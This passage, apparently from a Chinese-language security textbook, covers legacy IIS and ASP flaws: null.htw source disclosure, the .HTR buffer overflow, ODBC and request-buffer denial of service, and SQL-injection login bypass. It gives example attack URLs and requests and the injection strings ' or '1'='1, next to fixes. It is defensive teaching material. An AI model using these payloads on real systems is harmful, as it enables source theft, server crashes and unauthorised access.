P應(yīng)用程式可能面臨的攻擊。過(guò)去許多Internet上用CGI寫(xiě)的留言本或BBS是把客戶輸入的留言賦給一個(gè)變數(shù)，然後再把這個(gè)變數(shù)插入到顯示留言的HTML檔裏，因此客戶輸入的文本如要在HTML檔裏顯示就得符合HTML標(biāo)準(zhǔn)，而CGI程式裏一般都加入了特定的HTML語(yǔ)言。當(dāng)客戶輸入內(nèi)容，插入HTML檔時(shí)，即同時(shí)插入到了頭尾HTML語(yǔ)句中。9.6.5IndexServer服務(wù)對(duì)安全的影響在運(yùn)行IIS4或者IIS5的IndexServer，輸入特殊的字元格式可以看到ASP根源程式或者其他頁(yè)面的程式，甚至已經(jīng)添加了關(guān)於參看源代碼的補(bǔ)丁程式的系統(tǒng)，或者沒(méi)有.htw檔的系統(tǒng)，一樣存在該問(wèn)題。通過(guò)構(gòu)建下麵的特殊程式可以參看該程式源代碼：http://someurl/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full這樣只是返回一些html格式的檔代碼，但是當(dāng)添加%20到CiWebHitsFile的參數(shù)後面。由於“null.htw”檔並非真正的系統(tǒng)映射檔，只是一個(gè)儲(chǔ)存在系統(tǒng)記憶體中的虛擬檔。哪怕已經(jīng)從系統(tǒng)中刪除了所有的真實(shí)的.htw檔，但是由於對(duì)null.htw檔的請(qǐng)求默認(rèn)是由webhits.dll來(lái)處理。所以，IIS仍會(huì)受到該漏洞的威脅。問(wèn)題解決或者建議：如果該webhits提供的功能是系統(tǒng)必須的，請(qǐng)下載相應(yīng)的補(bǔ)丁程式。如果沒(méi)必要，請(qǐng)用IIS的MMC管理工具簡(jiǎn)單地移除.htw的映象檔。9.6.6IISWebServerDoS

默認(rèn)情況下，IIS容易被拒絕服務(wù)攻擊。如果註冊(cè)表中有一個(gè)叫

“MaxClientRequestBuffer”的鍵未被創(chuàng)建，則針對(duì)NT系統(tǒng)的這種攻擊通常能奏效。

“MaxClientRequestBuffer”這個(gè)鍵用於設(shè)置IIS允許接受的輸入量。如果設(shè)置為256（位元組），則攻擊者通過(guò)輸入大量的字元請(qǐng)求，IIS將被限制在256位元組以內(nèi)。而系統(tǒng)的缺省設(shè)置對(duì)此不加限制，因此，利用特殊的程式，就可以很容易地對(duì)IISServer實(shí)行DoS攻擊，導(dǎo)致NT系統(tǒng)的CPU佔(zhàn)用率達(dá)到100%。解決方案：運(yùn)行Regedt32.exe程式，在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters增加一個(gè)值：ValueName：

MaxClientRequestBufferDataType：REG_DWORD設(shè)置為十進(jìn)位，具體數(shù)值設(shè)置為想設(shè)定的IIS允許接受的URL最大長(zhǎng)度。CNNS的設(shè)置為256。9.6.7MSODBC資料庫(kù)連接溢出導(dǎo)致NT/9x拒絕服務(wù)攻擊MicrosoftODBC資料庫(kù)在連接和斷開(kāi)時(shí)可能存在潛在的溢出問(wèn)題（MicrosoftACCESS資料庫(kù)相關(guān)）。如果不取消連接而直接和第二個(gè)數(shù)據(jù)庫(kù)相連接，可能導(dǎo)致服務(wù)停止。影響系統(tǒng)：ODBC版本：3.510.3711.0ODBCAccess驅(qū)動(dòng)版本：3.51.1029.00OS版本：

WindowsNT4.0ServicePack5,IIS4.0(i386)MicrosoftOffice97Professional（MSO97.dll：507）漏洞檢測(cè)方法如下：ODBC連接源名稱：

miscdbODBC資料庫(kù)型號(hào)：

MSAccessODBC假設(shè)路徑：

d：\data\misc.mdbASP代碼如下：<%setconnVB=server.createobject("ADODB.Connection")connVB.open"DRIVER={MicrosoftAccessDriver(*.mdb)};DSN=miscdb“%><html><body>...lotsofhtmlremoved...<!--WeConnecttoDB1--><%setconnGlobal=server.createobject("ADODB.Connection")connGlobal.Open"DSN=miscdb;User=sa"mSQL="arbSQLStatement"setrsGlobal=connGlobal.execute(mSQL)WhilenotrsGlobal.eofResponse.WritersGlobal("resultfrommiscdb")rsGlobal.movenextwendrsGlobal.closesetrsGlobal=nothingconnGlobal.closesetconnGlobal=nothing'NotewedoNOTclosetheconnection%><!--CallthesamedatabasebymeansofDBQdirectfileaccess--><%setconnGlobal=server.createobject("ADODB.Connection")connGlobal.Open"DRIVER={MicrosoftAccessDriver(*.mdb)};DBQ=d：\data\misc.mdb"mSQL="arbSQLStatement"setrsGlobal=connGlobal.execute(mSQL)WhilenotrsGlobal.eofResponse.WritersGlobal("resultfrommiscdb")rsGlobal.movenextwendrsGlobal.closesetrsGlobal=nothingconnGlobal.closesetconnGlobal=nothing'NoteweDOclosetheconnection%>在這種情況下，IIS處理進(jìn)程將會(huì)停頓，CPU使用率由於inetinfo.exe進(jìn)程將達(dá)到100%。只有重新啟動(dòng)電腦才能恢復(fù)。

9.6.8IISServer4.0中的“非法HTR請(qǐng)求”缺陷該漏洞導(dǎo)致對(duì)於IIS伺服器的“服務(wù)拒絕攻擊”。在這種情況下，可能導(dǎo)致任何2進(jìn)制代碼在伺服器上運(yùn)行。駭客可以利用這一漏洞對(duì)IIS伺服器進(jìn)行完全的控制。

IIS支持多種需要伺服器端處理的檔類型，譬如：ASP、ASA、IDC、HTR，當(dāng)一個(gè)Web用戶從客戶端請(qǐng)求此類檔時(shí)，相應(yīng)的DLL檔將自動(dòng)對(duì)其進(jìn)行處理。然而在ISM.DLL這個(gè)負(fù)責(zé)處理HTR檔的檔中，被發(fā)現(xiàn)存在嚴(yán)重的安全漏洞。（注：HTR檔本身是用來(lái)遠(yuǎn)程管理用戶密碼的）該漏洞包含了一個(gè)在ISM.DLL中未經(jīng)驗(yàn)證的緩衝，它可能對(duì)Web伺服器的安全運(yùn)作造成兩方面的威脅。首先，是來(lái)自服務(wù)拒絕攻擊的威脅，一個(gè)來(lái)自非正常的對(duì).HTR檔請(qǐng)求將導(dǎo)致緩存溢出，從而直接導(dǎo)致IIS崩潰。當(dāng)這種情況發(fā)生時(shí)，無(wú)須重啟伺服器，但是IISWeb服務(wù)必須重新啟動(dòng)。另外，通過(guò)使用一個(gè)精心構(gòu)建過(guò)的檔請(qǐng)求將可以利用標(biāo)準(zhǔn)的緩存溢出手段導(dǎo)致2進(jìn)制代碼在伺服器端運(yùn)行，這種情況是很危險(xiǎn)的。該漏洞不包括提供用來(lái)管理用戶密碼的功能的.HTR檔。

至少在一個(gè)IIS的擴(kuò)展名中(例如：ASP、IDC及HTR)存在溢出。推測(cè)溢出將在IIS把完整的URL傳遞給DLL去處理擴(kuò)展名時(shí)發(fā)生。如果ISAPIDLL沒(méi)有正確的檢查限制範(fàn)圍從而導(dǎo)致INETINFO.EXE產(chǎn)生一個(gè)溢出,用戶就從可以遠(yuǎn)端執(zhí)行2進(jìn)制代碼。攻擊方法：向IIS發(fā)一個(gè)如下的HTTP請(qǐng)求：“GET/[overflow].htrHTTP/1.0”，IIS將崩潰。這裏的[overflow]可以是3K長(zhǎng)的代碼。IIS具有讓NT用戶通過(guò)Web目錄/iisadmpwd/更改自己口令的能力。而這個(gè)功能正是由一組.HTR檔和ISAPI的一個(gè)擴(kuò)展DLL——ISM.DLL實(shí)現(xiàn)的。當(dāng)一個(gè)完整的URL傳遞到ISM.DLL時(shí)，由於沒(méi)有適當(dāng)?shù)拇笮∠拗频臋z查，就會(huì)導(dǎo)致溢出產(chǎn)生，從而使得伺服器崩潰。HTR/ISM.DLLISAPI是IIS4缺省安裝。

解決途徑：

（1）將.HTR擴(kuò)展名從ISAPIDLL的列表中刪除

在NT桌面上，點(diǎn)擊“開(kāi)始”→“程式”→“WindowsNT4.0OptionPack”→“MicrosoftInternetInformationServer”→“Internet服務(wù)管理器”；雙擊“InternetInformationServer”；滑鼠右鍵單擊電腦名稱並選擇“屬性”；在“主屬性”下拉式菜單中選擇“WWW服務(wù)”並點(diǎn)擊“編輯”按鈕；選擇“主目錄”檔夾，並點(diǎn)擊“配置”按鈕，在“應(yīng)用程式映射”列表框中選中.HTR的相關(guān)映射，選擇“刪除”，並確定。

（2）安裝微軟提供的補(bǔ)丁程式。9.6.9ASP程式密碼驗(yàn)證漏洞很多網(wǎng)站把密碼放到資料庫(kù)中，在登陸驗(yàn)證中使用以下sql語(yǔ)句(以asp為例)：sql="selectfromuserwhereusername='"&username&"'andpass='"&pass&'"此時(shí)，只要根據(jù)sql構(gòu)造一個(gè)特殊的用戶名和密碼，此時(shí)，程式將會(huì)變成這樣：sql="select*fromusernamewhereusername="&ben'or'1'='1&"andpass="&pass&"

or是一個(gè)邏輯運(yùn)算符，只要其中一個(gè)條件成立，那麼等式將會(huì)成立。而在SQL語(yǔ)言中，是以1來(lái)代表真的(成立)，那麼在這行語(yǔ)句中，原語(yǔ)句的“and”驗(yàn)證將不再繼續(xù)，因?yàn)?1=1"和"or"令語(yǔ)句返回為真值.。另外也可以構(gòu)造以下的用戶名：

username='aa'orusername<>'aa'pass='aa'orpass<>'aa'相應(yīng)地在流覽器端的用戶名框內(nèi)寫(xiě)入：a